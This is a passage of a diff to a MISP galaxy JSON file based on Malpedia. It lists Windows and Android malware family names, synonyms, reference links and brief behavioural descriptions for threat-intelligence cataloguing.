"https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" - ] - }, - "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", - "value": "Zedhou", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Max++", - "Smiscer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", - "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", - "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", - "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", - "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", - "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html" - ] - }, - "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", - "value": "ZeroAccess", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", - "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil" - ] - }, - "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", - "value": "ZeroEvil", - "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", - "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" - ] - }, - "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", - "value": "ZeroT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", - "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", - "https://www.secureworks.com/research/zeus?threat=zeus", - "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", - "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "http://eternal-todo.com/blog/zeus-spreading-facebook", - "http://eternal-todo.com/blog/new-zeus-binary", - "http://eternal-todo.com/blog/detecting-zeus", - "https://www.mnin.org/write/ZeusMalware.pdf", - "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html", - "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "https://zeustracker.abuse.ch/monitor.php", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html" - ] - }, - "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", - "value": "Zeus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" - ] - }, - "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", - "value": "Zeus MailSniffer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", - "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", - "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", - "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/" - ] - }, - "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", - "value": "Zeus Sphinx", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl" - ] - }, - "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", - "value": "Zeus SSL", - "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", - "https://twitter.com/siri_urz/status/923479126656323584", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" - ] - }, - "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", - "value": "Zezin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", - "value": "ZhCat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "989330e9-52da-4489-888b-686429db3a45", - "value": "ZhMimikatz", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zeus Terdot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", - "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", - "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/" - ] - }, - "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", - "value": "Zloader", - "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor." - }, - { - "meta": { - "synonyms": [ - "gresim" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", - "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ] - }, - "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Sensocode" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", - "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://blogs.rsa.com/cat-phishing/", - "https://github.com/smb01/zxshell" - ] - }, - "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", - "value": "ZXShell", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", - "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" - ] - }, - "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", - "value": "Zyklon", - "description": "" - } - ], - "version": 1649, - "source": "Malpedia", - "name": "Malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" + "description": "Malware galaxy cluster based on Malpedia.", + "type": "malpedia", + "authors": [ + "Daniel Plohmann", + "Steffen Enders", + "Andrea Garavaglia", + "Davide Arcuri" + ], + "values": [ + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", + "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" + ] + }, + "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", + "value": "AdultSwine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", + "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", + "https://github.com/DesignativeDave/androrat" + ] + }, + "uuid": "80447111-8085-40a4-a052-420926091ac6", + "value": "AndroRAT", + "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", + "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" + ] + }, + "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", + "value": "AnubisSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" + ] + }, + "uuid": "85975621-5126-40cb-8083-55cbfa75121b", + "value": "BankBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", + "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", + "https://www.youtube.com/watch?v=1LOy0ZyjEOk" + ] + }, + "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", + "value": "Catelites", + "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", + "http://blog.checkpoint.com/2017/01/24/charger-malware/", + "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" + ] + }, + "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", + "value": "Charger", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pegasus", + "JigglyPuff" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", + "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://media.ccc.de/v/33c3-7901-pegasus_internals", + "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/" + ] + }, + "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", + "value": "Chrysaor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", + "https://twitter.com/LukasStefanko/status/1042297855602503681" + ] + }, + "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", + "value": "Clientor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SpyBanker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", + "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" + ] + }, + "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", + "value": "Connic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", + "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" + ] + }, + "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "value": "Cpuminer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", + "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" + ] + }, + "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", + "value": "DoubleLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", + "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + ] + }, + "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", + "value": "Dvmap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", + "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" + ] + }, + "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", + "value": "ExoBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "gugi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", + "https://twitter.com/LukasStefanko/status/886849558143279104" + ] + }, + "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", + "value": "FlexNet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", + "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" + ] + }, + "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", + "value": "GhostCtrl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", + "https://www.clearskysec.com/glancelove/", + "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", + "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", + "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", + "https://www.ci-project.org/blog/2017/3/4/arid-viper" + ] + }, + "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", + "value": "GlanceLove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", + "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" + ] + }, + "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", + "value": "HeroRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" + ] + }, + "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", + "value": "IRRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", + "https://blog.lookout.com/mobile-threat-jaderat" + ] + }, + "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", + "value": "JadeRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/" + ] + }, + "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", + "value": "KevDroid", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", + "https://twitter.com/LukasStefanko/status/928262059875213312" + ] + }, + "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", + "value": "Koler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" + ] + }, + "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", + "value": "Lazarus ELF Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", + "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" + ] + }, + "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", + "value": "Loki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", + "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" + ] + }, + "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", + "value": "LokiBot", + "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot." + }, + { + "meta": { + "synonyms": [ + "ExoBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", + "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", + "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", + "https://www.clientsidedetection.com/marcher.html", + "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" + ] + }, + "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", + "value": "Marcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", + "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", + "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" + ] + }, + "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", + "value": "MazarBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", + "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" + ] + }, + "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", + "value": "MysteryBot", + "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", + "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", + "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" + ] + }, + "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", + "value": "OmniRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Popr-d30" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", + "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", + "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" + ] + }, + "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", + "value": "Fake Pornhub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", + "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" + ] + }, + "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", + "value": "Raxir", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", + "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores" + ] + }, + "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", + "value": "RedAlert2", + "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", + "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", + "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", + "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", + "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" + ] + }, + "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "value": "Retefe", + "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", + "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", + "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" + ] + }, + "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", + "value": "Roaming Mantis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", + "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", + "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" + ] + }, + "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", + "value": "Rootnik", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", + "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" + ] + }, + "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", + "value": "Skygofree", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SlemBunk" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", + "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", + "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" + ] + }, + "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", + "value": "Slempo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", + "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" + ] + }, + "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", + "value": "Slocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" + ] + }, + "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", + "value": "SMSspy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", + "https://news.drweb.com/show/?i=11104&lng=en", + "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" + ] + }, + "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", + "value": "SpyBanker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "31592c69-d540-4617-8253-71ae0c45526c", + "value": "SpyNote", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", + "value": "StealthAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", + "https://www.lookout.com/info/stealth-mango-report-ty" + ] + }, + "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", + "value": "Stealth Mango", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", + "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" + ] + }, + "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", + "value": "Svpeng", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", + "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" + ] + }, + "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", + "value": "Switcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" + ] + }, + "uuid": 